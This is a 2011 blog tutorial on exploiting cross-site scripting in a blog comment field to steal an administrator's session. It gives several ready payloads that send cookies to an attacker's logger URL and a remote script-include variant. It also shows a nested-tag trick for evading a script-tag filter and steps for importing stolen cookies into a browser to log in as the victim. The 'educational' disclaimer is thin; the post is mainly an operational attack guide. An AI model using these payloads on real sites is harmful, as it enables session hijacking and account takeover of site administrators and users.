Monday, January 24, 2011
Cross Site Scripting (Using a hole to Hack with XSS)
- We find a blog which allows users user to input data.
- This data is displayed, unedited or sanitised on the blog index page.
- We want to inject a XSS to log the administrative users cookies.
- We want to login with the cookie we have stolen.
Note : This is for educational purpose for designers or for my readers to make there website safe.
What we shall need :
Heres a list of things you will need through-out the tutorial :
Mozilla Firefox (Use an old version not latest).
FF addon : Add & Edit Cookies.
FF addon : Live HTTP Headers.
An ACTIVE cookie logger.(Google it yourself i don't want to put it here and to break laws.)
A basic understanding of JavaScript is an advantage, but not essential.(Refer www.w3schools.com )
A XSS vulnerability to test and exploit. Refer to my Old post On XSS. Hosting is up to you, try this free PHP web host , 000webhost etc.
The desire and dedication to learn. [Yourself.]
Identifying & Exploiting the Vulnerability:
Identifying a XSS vulnerability can be pretty straight forward in most cases. A typical method of testing for a XSS vulnerability would be infamous 'Alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test will make an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function Alert.<script>alert('hackersthirst.com')</script>This would display a message box with hackersthirst.com as the message.
To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case using the included vulnerable test page, input the string <script>alert('hackersthirst.com')</script>. Now the page will execute this and you should get an alert box displaying the message 'hackersthirst.com'.
Another method of testing for vulnerability is the document.write method. The same concepts and structure is applied to this method as the alert method, we're just using the document.write function instead of the alert function. So this time we insert :
<script>document.write('hackersthirst.com')</script>This time the script will return the string 'hackersthirst.com', (without quotes), and will write it to the page, where the string is supposed to be shown.
Below i am giving a short description on how to exploit this.
Exploiting XSS hole :
After identifying the XSS hole what a hacker will do . Its demonstrated by given example :
(in this example we will be covering cookie stealing), we will go over setting up our logger and a few methods of doing so.
Example 1 :
Our cookie logger URL : http://site.com/cookielogger.php Vulnerable Page : http://someblog.com/index.php Injection Point : http://someblog.com/post.php
Now we have all this setup, we can crack on. You can use the following methods to log cookies using JavaScript :
<script>location.href='http://site.com/cookielogger.php?cookie='+cookie</script>
<script>document.location='http://site.com/cookielogger.php?cookie='+cookie</script>
<script>window.open('http://site.com/cookielogger.php?cookie='+cookie)</script>
<script>window.location='http://site.com/cookielogger.php?cookie='+cookie</script>
Once you have posted this to the blogging system, and it's echoed on the index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie.
Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, and is fetched by the <script src> tag, and then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms, and keyloggers, but is definitely worth knowing.
Example 2 :
Our cookie logger URL : http://site.com/cookielogger.php
Our script URL : http://site.com/script.js
Vulnerable Page : http://someblog.com/index.php
Injection Point : http://someblog.com/post.php
Here is how we include or foreign script :
<script src='http://site.com/script.js'></script>
Inside the script we just need the logger, use a function from Example 1. An example of our script would be :
location.href='http://site.com/cookielogger.php?cookie='+cookie;
Again, like anything, patience is a virtue.
Here the site is your own hosting site to host the cookielogger srcipt.
Possible Limitations and Basic Filter Evasion Techniques :
The filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass.
Example 1 ~ Tag Removal :
I insert the JavaScript : '<script>alert('XSS')</script>',and it returns the string : alert('XSS').
Never fear, there is away around this. If I now insert this : '<scr<script>ipt>alert('XSS')</scr</script>ipt>'
Now the script will remove the tags, and echo what's left, which is : <script>alert('XSS')</script>.
There are other methods also. Use Google.
Well if your hosting site is too long then a smart tip is this that you use ip instead of URL.
What to do when you get cookies in txt. file in hosting :
These are the steps:
- Open FireFox.
- Click on Tools in the menu bar.
- Click on Cookie Editor.
- Click on Add.
5.In name, add the name of that cookie, (the bit before the =)
6.In content, add the value.
7. In host, add .site.com, unless its a sub domain or otherwise stated, (the dot infront of the domain name is important).
8.In path, write /, unless you have the exact path where you want the cookie to be active.
Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in. So, Thats a short guide on XSS.
No comments:
Post a Comment